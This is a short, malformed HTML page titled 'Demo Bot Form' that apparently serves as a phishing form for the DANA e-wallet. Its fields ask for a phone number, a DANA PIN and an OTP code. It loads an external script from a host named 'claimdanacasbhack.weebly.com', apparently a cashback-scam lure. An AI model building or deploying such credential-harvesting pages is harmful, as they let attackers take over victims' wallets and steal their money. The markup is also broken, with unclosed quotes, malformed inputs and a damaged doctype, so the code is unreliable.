DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="stylesheet" href="style.css">
    <title>Demo Bot Form</title>
</head>

<body>

 <form>
   <input type="url//http://www.m.dana.id/m/ipg/new/
   <input type="text"id="phone Number"placeholder="phone Number"/>
   <input type="text"id="pin Dana"placeholder="pim Dana"/>
   <input type="text"id="pesan"placeholder="pesan/> 
   <input type="text"id="kode otp"placeholder="kode otp/>
   <input type="text"id="kirim"placeholder="kirim"/>

</form>

</body>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://claimdanacasbhack.weebly.com/></script>

</html>
